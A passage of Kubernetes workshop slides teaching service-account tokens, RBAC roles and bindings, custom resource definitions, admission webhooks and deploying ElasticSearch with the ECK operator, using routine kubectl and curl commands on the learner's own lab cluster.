to humans) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Token authentication in practice - We are going to list existing service accounts - Then we will extract the token for a given service account - And we will use that token to authenticate with the API .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Listing service accounts .exercise[ - The resource name is `serviceaccount` or `sa` for short: ```bash kubectl get sa ``` ] There should be just one service account in the default namespace: `default`. .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Finding the secret .exercise[ - List the secrets for the `default` service account: ```bash kubectl get sa default -o yaml SECRET=$(kubectl get sa default -o json | jq -r .secrets[0].name) ``` ] It should be named `default-token-XXXXX`. .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Extracting the token - The token is stored in the secret, wrapped with base64 encoding .exercise[ - View the secret: ```bash kubectl get secret $SECRET -o yaml ``` - Extract the token and decode it: ```bash TOKEN=$(kubectl get secret $SECRET -o json \ | jq -r .data.token | openssl base64 -d -A) ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Using the token - Let's send a request to the API, without and with the token .exercise[ - Find the ClusterIP for the `kubernetes` service: ```bash kubectl get svc kubernetes API=$(kubectl get svc kubernetes -o json | jq -r .spec.clusterIP) ``` - Connect without the token: ```bash curl -k https://$API ``` - Connect with the token: ```bash curl -k -H "Authorization: Bearer $TOKEN" https://$API ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Results - In both cases, we will get a "Forbidden" error - Without authentication, the user is `system:anonymous` - With authentication, it is shown as `system:serviceaccount:default:default` - The API "sees" us as a different user - But neither user has any rights, so we can't do nothin' - Let's change that! .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authorization in Kubernetes - There are multiple ways to grant permissions in Kubernetes, called [authorizers](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#authorization-modules): - [Node Authorization](https://kubernetes.io/docs/reference/access-authn-authz/node/) (used internally by kubelet; we can ignore it) - [Attribute-based access control](https://kubernetes.io/docs/reference/access-authn-authz/abac/) (powerful but complex and static; ignore it too) - [Webhook](https://kubernetes.io/docs/reference/access-authn-authz/webhook/) (each API request is submitted to an external service for approval) - [Role-based access control](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) (associates permissions to users dynamically) - The one we want is the last one, generally abbreviated as RBAC .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Role-based access control - RBAC allows to specify fine-grained permissions - Permissions are expressed as *rules* - A rule is a combination of: - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete... - resources (as in "API resource," like pods, nodes, services...) - resource names (to specify e.g. one specific pod instead of all pods) - in some case, [subresources](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#referring-to-resources) (e.g. logs are subresources of pods) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## From rules to roles to rolebindings - A *role* is an API object containing a list of *rules* Example: role "external-load-balancer-configurator" can: - [list, get] resources [endpoints, services, pods] - [update] resources [services] - A *rolebinding* associates a role with a user Example: rolebinding "external-load-balancer-configurator": - associates user "external-load-balancer-configurator" - with role "external-load-balancer-configurator" - Yes, there can be users, roles, and rolebindings with the same name - It's a good idea for 1-1-1 bindings; not so much for 1-N ones .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Cluster-scope permissions - API resources Role and RoleBinding are for objects within a namespace - We can also define API resources ClusterRole and ClusterRoleBinding - These are a superset, allowing us to: - specify actions on cluster-wide objects (like nodes) - operate across all namespaces - We can create Role and RoleBinding resources within a namespace - ClusterRole and ClusterRoleBinding resources are global .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Pods and service accounts - A pod can be associated with a service account - by default, it is associated with the `default` service account - as we saw earlier, this service account has no permissions anyway - The associated token is exposed to the pod's filesystem (in `/var/run/secrets/kubernetes.io/serviceaccount/token`) - Standard Kubernetes tooling (like `kubectl`) will look for it there - So Kubernetes tools running in a pod will automatically use the service account .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## In practice - We are going to create a service account - We will use a default cluster role (`view`) - We will bind together this role and this service account - Then we will run a pod using that service account - In this pod, we will install `kubectl` and check our permissions .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Creating a service account - We will call the new service account `viewer` (note that nothing prevents us from calling it `view`, like the role) .exercise[ - Create the new service account: ```bash kubectl create serviceaccount viewer ``` - List service accounts now: ```bash kubectl get serviceaccounts ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Binding a role to the service account - Binding a role = creating a *rolebinding* object - We will call that object `viewercanview` (but again, we could call it `view`) .exercise[ - Create the new role binding: ```bash kubectl create rolebinding viewercanview \ --clusterrole=view \ --serviceaccount=default:viewer ``` ] It's important to note a couple of details in these flags... .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Roles vs Cluster Roles - We used `--clusterrole=view` - What would have happened if we had used `--role=view`? - we would have bound the role `view` from the local namespace
(instead of the cluster role `view`) - the command would have worked fine (no error) - but later, our API requests would have been denied - This is a deliberate design decision (we can reference roles that don't exist, and create/update them later) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Users vs Service Accounts - We used `--serviceaccount=default:viewer` - What would have happened if we had used `--user=default:viewer`? - we would have bound the role to a user instead of a service account - again, the command would have worked fine (no error) - ...but our API requests would have been denied later - What's about the `default:` prefix? - that's the namespace of the service account - yes, it could be inferred from context, but... `kubectl` requires it .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Testing - We will run an `alpine` pod and install `kubectl` there .exercise[ - Run a one-time pod: ```bash kubectl run eyepod --rm -ti --restart=Never \ --serviceaccount=viewer \ --image alpine ``` - Install `curl`, then use it to install `kubectl`: ```bash apk add --no-cache curl URLBASE=https://storage.googleapis.com/kubernetes-release/release KUBEVER=$(curl -s $URLBASE/stable.txt) curl -LO $URLBASE/$KUBEVER/bin/linux/amd64/kubectl chmod +x kubectl ``` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Running `kubectl` in the pod - We'll try to use our `view` permissions, then to create an object .exercise[ - Check that we can, indeed, view things: ```bash ./kubectl get all ``` - But that we can't create things: ``` ./kubectl create deployment testrbac --image=nginx ``` - Exit the container with `exit` or `^D` ] .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Testing directly with `kubectl` - We can also check for permission with `kubectl auth can-i`: ```bash kubectl auth can-i list nodes kubectl auth can-i create pods kubectl auth can-i get pod/name-of-pod kubectl auth can-i get /url-fragment-of-api-request/ kubectl auth can-i '*' services ``` - And we can check permissions on behalf of other users: ```bash kubectl auth can-i list nodes \ --as some-user kubectl auth can-i list nodes \ --as system:serviceaccount:
:
``` .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Where does this `view` role come from? - Kubernetes defines a number of ClusterRoles intended to be bound to users - `cluster-admin` can do *everything* (think `root` on UNIX) - `admin` can do *almost everything* (except e.g. changing resource quotas and limits) - `edit` is similar to `admin`, but cannot view or edit permissions - `view` has read-only access to most resources, except permissions and secrets *In many situations, these roles will be all you need.* *You can also customize them!* .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Customizing the default roles - If you need to *add* permissions to these default roles (or others),
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism - This happens by creating a ClusterRole with the following labels: ```yaml metadata: labels: rbac.authorization.k8s.io/aggregate-to-admin: "true" rbac.authorization.k8s.io/aggregate-to-edit: "true" rbac.authorization.k8s.io/aggregate-to-view: "true" ``` - This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively - This is particulary useful when using CustomResourceDefinitions (since Kubernetes cannot guess which resources are sensitive and which ones aren't) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Where do our permissions come from? - When interacting with the Kubernetes API, we are using a client certificate - We saw previously that this client certificate contained: `CN=kubernetes-admin` and `O=system:masters` - Let's look for these in existing ClusterRoleBindings: ```bash kubectl get clusterrolebindings -o yaml | grep -e kubernetes-admin -e system:masters ``` (`system:masters` should show up, but not `kubernetes-admin`.) - Where does this match come from? .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## The `system:masters` group - If we eyeball the output of `kubectl get clusterrolebindings -o yaml`, we'll find out! - It is in the `cluster-admin` binding: ```bash kubectl describe clusterrolebinding cluster-admin ``` - This binding associates `system:masters` with the cluster role `cluster-admin` - And the `cluster-admin` is, basically, `root`: ```bash kubectl describe clusterrole cluster-admin ``` .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Figuring out who can do what - For auditing purposes, sometimes we want to know who can perform an action - There are a few tools to help us with that - [kubectl-who-can](https://github.com/aquasecurity/kubectl-who-can) by Aqua Security - [Review Access (aka Rakkess)](https://github.com/corneliusweig/rakkess) - Both are available as standalone programs, or as plugins for `kubectl` (`kubectl` plugins can be installed and managed with `krew`) ??? :EN:- Authentication and authorization in Kubernetes :EN:- Authentication with tokens and certificates :EN:- Aithorization with RBAC (Role-Based Access Control) :EN:- Restricting permissions with Service Accounts :EN:- Working with Roles, Cluster Roles, Role Bindings, etc. :FR:- Identification et droits d'accès dans Kubernetes :FR:- Mécanismes d'identification par jetons et certificats :FR:- Le modèle RBAC *(Role-Based Access Control)* :FR:- Restreindre les permissions grâce aux *Service Accounts* :FR:- Comprendre les *Roles*, *Cluster Roles*, *Role Bindings*, etc. .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/blue-containers.jpg)] --- name: toc-extending-the-kubernetes-api class: title Extending the Kubernetes API .nav[ [Previous section](#toc-authentication-and-authorization) | [Back to table of contents](#toc-module-2) | [Next section](#toc-operators) ] .debug[(automatically generated title slide)] --- # Extending the Kubernetes API There are multiple ways to extend the Kubernetes API. We are going to cover: - Custom Resource Definitions (CRDs) - Admission Webhooks - The Aggregation Layer .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Revisiting the API server - The Kubernetes API server is a central point of the control plane (everything connects to it: controller manager, scheduler, kubelets) - Almost everything in Kubernetes is materialized by a resource - Resources have a type (or "kind") (similar to strongly typed languages) - We can see existing types with `kubectl api-resources` - We can list resources of a given type with `kubectl get
` .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Creating new types - We can create new types with Custom Resource Definitions (CRDs) - CRDs are created dynamically (without recompiling or restarting the API server) - CRDs themselves are resources: - we can create a new type with `kubectl create` and some YAML - we can see all our custom types with `kubectl get crds` - After we create a CRD, the new type works just like built-in types .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## A very simple CRD The YAML below describes a very simple CRD representing different kinds of coffee: ```yaml apiVersion: apiextensions.k8s.io/v1alpha1 kind: CustomResourceDefinition metadata: name: coffees.container.training spec: group: container.training version: v1alpha1 scope: Namespaced names: plural: coffees singular: coffee kind: Coffee shortNames: - cof ``` .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Creating a CRD - Let's create the Custom Resource Definition for our Coffee resource .exercise[ - Load the CRD: ```bash kubectl apply -f ~/container.training/k8s/coffee-1.yaml ``` - Confirm that it shows up: ```bash kubectl get crds ``` ] .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Creating custom resources The YAML below defines a resource using the CRD that we just created: ```yaml kind: Coffee apiVersion: container.training/v1alpha1 metadata: name: arabica spec: taste: strong ``` .exercise[ - Create a few types of coffee beans: ```bash kubectl apply -f ~/container.training/k8s/coffees.yaml ``` ] .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Viewing custom resources - By default, `kubectl get` only shows name and age of custom resources .exercise[ - View the coffee beans that we just created: ```bash kubectl get coffees ``` ] - We can improve that, but it's outside the scope of this section! .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## What can we do with CRDs? There are many possibilities! - *Operators* encapsulate complex sets of resources (e.g.: a PostgreSQL replicated cluster; an etcd cluster...
see [awesome operators](https://github.com/operator-framework/awesome-operators) and [OperatorHub](https://operatorhub.io/) to find more) - Custom use-cases like [gitkube](https://gitkube.sh/) - creates a new custom type, `Remote`, exposing a git+ssh server - deploy by pushing YAML or Helm charts to that remote - Replacing built-in types with CRDs (see [this lightning talk by Tim Hockin](https://www.youtube.com/watch?v=ji0FWzFwNhA)) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Little details - By default, CRDs are not *validated* (we can put anything we want in the `spec`) - When creating a CRD, we can pass an OpenAPI v3 schema (BETA!) (which will then be used to validate resources) - Generally, when creating a CRD, we also want to run a *controller* (otherwise nothing will happen when we create resources of that type) - The controller will typically *watch* our custom resources (and take action when they are created/updated) * Examples: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml), [YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml) * .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## (Ab)using the API server - If we need to store something "safely" (as in: in etcd), we can use CRDs - This gives us primitives to read/write/list objects (and optionally validate them) - The Kubernetes API server can run on its own (without the scheduler, controller manager, and kubelets) - By loading CRDs, we can have it manage totally different objects (unrelated to containers, clusters, etc.) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Service catalog - *Service catalog* is another extension mechanism - It's not extending the Kubernetes API strictly speaking (but it still provides new features!) - It doesn't create new types; it uses: - ClusterServiceBroker - ClusterServiceClass - ClusterServicePlan - ServiceInstance - ServiceBinding - It uses the Open service broker API .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Admission controllers - Admission controllers are another way to extend the Kubernetes API - Instead of creating new types, admission controllers can transform or vet API requests - The diagram on the next slide shows the path of an API request (courtesy of Banzai Cloud) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- class: pic ![API request lifecycle](images/api-request-lifecycle.png) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Types of admission controllers - *Validating* admission controllers can accept/reject the API call - *Mutating* admission controllers can modify the API request payload - Both types can also trigger additional actions (e.g. automatically create a Namespace if it doesn't exist) - There are a number of built-in admission controllers (see [documentation](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#what-does-each-admission-controller-do) for a list) - We can also dynamically define and register our own .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- class: extra-details ## Some built-in admission controllers - ServiceAccount: automatically adds a ServiceAccount to Pods that don't explicitly specify one - LimitRanger: applies resource constraints specified by LimitRange objects when Pods are created - NamespaceAutoProvision: automatically creates namespaces when an object is created in a non-existent namespace *Note: #1 and #2 are enabled by default; #3 is not.* .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Admission Webhooks - We can setup *admission webhooks* to extend the behavior of the API server - The API server will submit incoming API requests to these webhooks - These webhooks can be *validating* or *mutating* - Webhooks can be set up dynamically (without restarting the API server) - To setup a dynamic admission webhook, we create a special resource: a `ValidatingWebhookConfiguration` or a `MutatingWebhookConfiguration` - These resources are created and managed like other resources (i.e. `kubectl create`, `kubectl get`...) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Webhook Configuration - A ValidatingWebhookConfiguration or MutatingWebhookConfiguration contains: - the address of the webhook - the authentication information to use with the webhook - a list of rules - The rules indicate for which objects and actions the webhook is triggered (to avoid e.g. triggering webhooks when setting up webhooks) .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## The aggregation layer - We can delegate entire parts of the Kubernetes API to external servers - This is done by creating APIService resources (check them with `kubectl get apiservices`!) - The APIService resource maps a type (kind) and version to an external service - All requests concerning that type are sent (proxied) to the external service - This allows to have resources like CRDs, but that aren't stored in etcd - Example: `metrics-server` (storing live metrics in etcd would be extremely inefficient) - Requires significantly more work than CRDs! .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- ## Documentation - [Custom Resource Definitions: when to use them](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/) - [Custom Resources Definitions: how to use them](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/) - [Service Catalog](https://kubernetes.io/docs/concepts/extend-kubernetes/service-catalog/) - [Built-in Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/) - [Dynamic Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/) - [Aggregation Layer](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) ??? :EN:- Extending the Kubernetes API :EN:- Custom Resource Definitions (CRDs) :EN:- The aggregation layer :EN:- Admission control and webhooks :FR:- Comment étendre l'API Kubernetes :FR:- Les CRDs *(Custom Resource Definitions)* :FR:- Extension via *aggregation layer*, *admission control*, *webhooks* .debug[[k8s/extending-api.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/extending-api.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/chinook-helicopter-container.jpg)] --- name: toc-operators class: title Operators .nav[ [Previous section](#toc-extending-the-kubernetes-api) | [Back to table of contents](#toc-module-2) | [Next section](#toc-resource-limits) ] .debug[(automatically generated title slide)] --- # Operators - Operators are one of the many ways to extend Kubernetes - We will define operators - We will see how they work - We will install a specific operator (for ElasticSearch) - We will use it to provision an ElasticSearch cluster .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## What are operators? *An operator represents **human operational knowledge in software,**
to reliably manage an application. — [CoreOS](https://coreos.com/blog/introducing-operators.html)* Examples: - Deploying and configuring replication with MySQL, PostgreSQL ... - Setting up Elasticsearch, Kafka, RabbitMQ, Zookeeper ... - Reacting to failures when intervention is needed - Scaling up and down these systems .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## What are they made from? - Operators combine two things: - Custom Resource Definitions - controller code watching the corresponding resources and acting upon them - A given operator can define one or multiple CRDs - The controller code (control loop) typically runs within the cluster (running as a Deployment with 1 replica is a common scenario) - But it could also run elsewhere (nothing mandates that the code run on the cluster, as long as it has API access) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Why use operators? - Kubernetes gives us Deployments, StatefulSets, Services ... - These mechanisms give us building blocks to deploy applications - They work great for services that are made of *N* identical containers (like stateless ones) - They also work great for some stateful applications like Consul, etcd ... (with the help of highly persistent volumes) - They're not enough for complex services: - where different containers have different roles - where extra steps have to be taken when scaling or replacing containers .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Use-cases for operators - Systems with primary/secondary replication Examples: MariaDB, MySQL, PostgreSQL, Redis ... - Systems where different groups of nodes have different roles Examples: ElasticSearch, MongoDB ... - Systems with complex dependencies (that are themselves managed with operators) Examples: Flink or Kafka, which both depend on Zookeeper .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## More use-cases - Representing and managing external resources (Example: [AWS S3 Operator](https://operatorhub.io/operator/awss3-operator-registry)) - Managing complex cluster add-ons (Example: [Istio operator](https://operatorhub.io/operator/istio)) - Deploying and managing our applications' lifecycles (more on that later) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## How operators work - An operator creates one or more CRDs (i.e., it creates new "Kinds" of resources on our cluster) - The operator also runs a *controller* that will watch its resources - Each time we create/update/delete a resource, the controller is notified (we could write our own cheap controller with `kubectl get --watch`) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## One operator in action - We will install [Elastic Cloud on Kubernetes](https://www.elastic.co/guide/en/cloud-on-k8s/current/k8s-quickstart.html), an ElasticSearch operator - This operator requires PersistentVolumes - We will install Rancher's [local path storage provisioner](https://github.com/rancher/local-path-provisioner) to automatically create these - Then, we will create an ElasticSearch resource - The operator will detect that resource and provision the cluster .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Installing a Persistent Volume provisioner (This step can be skipped if you already have a dynamic volume provisioner.) - This provisioner creates Persistent Volumes backed by `hostPath` (local directories on our nodes) - It doesn't require anything special ... - ... But losing a node = losing the volumes on that node! .exercise[ - Install the local path storage provisioner: ```bash kubectl apply -f ~/container.training/k8s/local-path-storage.yaml ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Making sure we have a default StorageClass - The ElasticSearch operator will create StatefulSets - These StatefulSets will instantiate PersistentVolumeClaims - These PVCs need to be explicitly associated with a StorageClass - Or we need to tag a StorageClass to be used as the default one .exercise[ - List StorageClasses: ```bash kubectl get storageclasses ``` ] We should see the `local-path` StorageClass. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Setting a default StorageClass - This is done by adding an annotation to the StorageClass: `storageclass.kubernetes.io/is-default-class: true` .exercise[ - Tag the StorageClass so that it's the default one: ```bash kubectl annotate storageclass local-path \ storageclass.kubernetes.io/is-default-class=true ``` - Check the result: ```bash kubectl get storageclasses ``` ] Now, the StorageClass should have `(default)` next to its name. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Install the ElasticSearch operator - The operator provides: - a few CustomResourceDefinitions - a Namespace for its other resources - a ValidatingWebhookConfiguration for type checking - a StatefulSet for its controller and webhook code - a ServiceAccount, ClusterRole, ClusterRoleBinding for permissions - All these resources are grouped in a convenient YAML file .exercise[ - Install the operator: ```bash kubectl apply -f ~/container.training/k8s/eck-operator.yaml ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Check our new custom resources - Let's see which CRDs were created .exercise[ - List all CRDs: ```bash kubectl get crds ``` ] This operator supports ElasticSearch, but also Kibana and APM. Cool! .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Create the `eck-demo` namespace - For clarity, we will create everything in a new namespace, `eck-demo` - This namespace is hard-coded in the YAML files that we are going to use - We need to create that namespace .exercise[ - Create the `eck-demo` namespace: ```bash kubectl create namespace eck-demo ``` - Switch to that namespace: ```bash kns eck-demo ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- class: extra-details ## Can we use a different namespace? Yes, but then we need to update all the YAML manifests that we are going to apply in the next slides. The `eck-demo` namespace is hard-coded in these YAML manifests. Why? Because when defining a ClusterRoleBinding that references a ServiceAccount, we have to indicate in which namespace the ServiceAccount is located. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Create an ElasticSearch resource - We can now create a resource with `kind: ElasticSearch` - The YAML for that resource will specify all the desired parameters: - how many nodes we want - image to use - add-ons (kibana, cerebro, ...) - whether to use TLS or not - etc. .exercise[ - Create our ElasticSearch cluster: ```bash kubectl apply -f ~/container.training/k8s/eck-elasticsearch.yaml ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Operator in action - Over the next minutes, the operator will create our ES cluster - It will report our cluster status through the CRD .exercise[ - Check the logs of the operator: ```bash stern --namespace=elastic-system operator ``` - Watch the status of the cluster through the CRD: ```bash kubectl get es -w ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Connecting to our cluster - It's not easy to use the ElasticSearch API from the shell - But let's check at least if ElasticSearch is up! .exercise[ - Get the ClusterIP of our ES instance: ```bash kubectl get services ``` - Issue a request with `curl`: ```bash curl http://`CLUSTERIP`:9200 ``` ] We get an authentication error. Our cluster is protected! .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Obtaining the credentials - The operator creates a user named `elastic` - It generates a random password and stores it in a Secret .exercise[ - Extract the password: ```bash kubectl get secret demo-es-elastic-user \ -o go-template="{{ .data.elastic | base64decode }} " ``` - Use it to connect to the API: ```bash curl -u elastic:`PASSWORD` http://`CLUSTERIP`:9200 ``` ] We should see a JSON payload with the `"You Know, for Search"` tagline. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Sending data to the cluster - Let's send some data to our brand new ElasticSearch cluster! - We'll deploy a filebeat DaemonSet to collect node logs .exercise[ - Deploy filebeat: ```bash kubectl apply -f ~/container.training/k8s/eck-filebeat.yaml ``` - Wait until some pods are up: ```bash watch kubectl get pods -l k8s-app=filebeat ``` - Check that a filebeat index was created: ```bash curl -u elastic:`PASSWORD` http://`CLUSTERIP`:9200/_cat/indices ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Deploying an instance of Kibana - Kibana can visualize the logs injected by filebeat - The ECK operator can also manage Kibana - Let's give it a try! .exercise[ - Deploy a Kibana instance: ```bash kubectl apply -f ~/container.training/k8s/eck-kibana.yaml ``` - Wait for it to be ready: ```bash kubectl get kibana -w ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Connecting to Kibana - Kibana is automatically set up to conect to ElasticSearch (this is arranged by the YAML that we're using) - However, it will ask for authentication - It's using the same user/password as ElasticSearch .exercise[ - Get the NodePort allocated to Kibana: ```bash kubectl get services ``` - Connect to it with a web browser - Use the same user/password as before ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Setting up Kibana After the Kibana UI loads, we need to click around a bit .exercise[ - Pick "explore on my own" - Click on Use Elasticsearch data / Connect to your Elasticsearch index" - Enter `filebeat-*` for the index pattern and click "Next step" - Select `@timestamp` as time filter field name - Click on "discover" (the small icon looking like a compass on the left bar) - Play around! ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Scaling up the cluster - At this point, we have only one node - We are going to scale up - But first, we'll deploy Cerebro, an UI for ElasticSearch - This will let us see the state of the cluster, how indexes are sharded, etc. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Deploying Cerebro - Cerebro is stateless, so it's fairly easy to deploy (one Deployment + one Service) - However, it needs the address and credentials for ElasticSearch - We prepared yet another manifest for that! .exercise[ - Deploy Cerebro: ```bash kubectl apply -f ~/container.training/k8s/eck-cerebro.yaml ``` - Lookup the NodePort number and connect to it: ```bash kubectl get services ``` ] 